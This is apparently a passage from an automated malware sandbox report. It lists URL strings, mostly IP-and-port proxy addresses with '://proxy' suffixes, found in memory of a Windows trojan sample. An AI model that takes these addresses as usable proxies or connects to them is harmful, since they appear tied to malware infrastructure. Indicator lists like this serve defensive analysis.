                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.16.74.241:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.164.138.34:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.164.138.34:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.168.91.238:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.168.91.238:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C808B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.175.22.194:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C808B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.175.22.194:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7FBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.177.217.131:16150
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.177.217.131:16150://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C91E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.177.217.131:33721
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.177.217.131:33721://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.178.33.86:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.178.33.86:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.178.56.33:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.178.56.33:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C82FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.178.56.33:8080x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.178.56.37:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.178.56.37:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C69E3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.201.246.166:5566
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.201.246.166:5566://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.206.39.222:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.206.39.222:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF41000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.222.189.105:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.222.189.105:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7678000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C80B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.225.142.169:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C80B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.225.142.169:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.23.57.78
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C675D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.23.57.78://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C675D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.23.57.78:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.246.54.31:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.246.54.31:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6933000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.248.243.149:7237
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.248.243.149:7237://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.30.84.215:32858
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.30.84.215:32858://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.30.84.217:34090
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.30.84.217:34090://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.30.84.218:34090
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.30.84.218:34090://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.30.84.219:34090
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.30.84.219:34090://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.30.84.74:34090
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.30.84.74:34090://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.30.84.76:34090
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.30.84.76:34090://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.30.84.78:34090
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.30.84.78:34090://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.34.91.67:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.34.91.67:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.35.20.90
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.35.20.90://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.35.20.90:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.35.29.39
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.35.29.39://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.35.29.39:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.35.3.117
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.35.3.117://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.35.3.117:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.36.17.173:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.36.17.173:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.66.156.196:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.66.156.196:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.74.72.111:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.74.72.111:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.90.216.75:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.90.216.75:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.93.200.140
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA4FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://195.93.200.140://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.0.111.186:46048
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.0.111.186:46048://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.0.111.194:48009
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.0.111.194:48009://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.1.95.124
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.1.95.124://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.1.95.124:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.15.237.
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E92000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.15.237.197:1888
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.15.237.197:1888://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.2.13.12:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.2.13.12:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.20.12.21:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7883000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.20.12.21:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C70EF000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.20.12.25:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.20.12.25:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.20.125.129:8083
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.20.125.129:8083://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.20.125.133:8083
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.20.125.133:8083://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.20.21.82:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.20.21.82:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.202.210.73:32650
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.202.210.73:32650://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.204.24.251:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.204.24.251:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.216.13.36:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.216.13.36:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.216.65.57:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.216.65.57:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.219.202.74:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.219.202.74:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.223.129.21
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.223.129.21://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.223.129.21:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA50C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA6C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.251.221.30:8104
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA533000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.251.221.30:8104://proxyP
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.3.99.162:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.3.99.162:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFFB000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC6FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.43.97.114:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC6FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.43.97.114:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.61.44.54:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.61.44.54:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.157.254.162:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.157.254.162:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.159.130.134:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.159.130.134:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.211.240.119:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.211.240.119:5678://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C80FA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C80F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.232.36.85:41890
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C80FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.232.36.85:41890://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C84D2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.232.47.122:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.232.47.122:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.232.65.40:55443
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.232.65.40:55443://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C692F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.232.85.163:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C692F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.232.85.163:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.121.222:8291
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.121.222:8291://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.24:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://197.234.13.24:4145://proxy
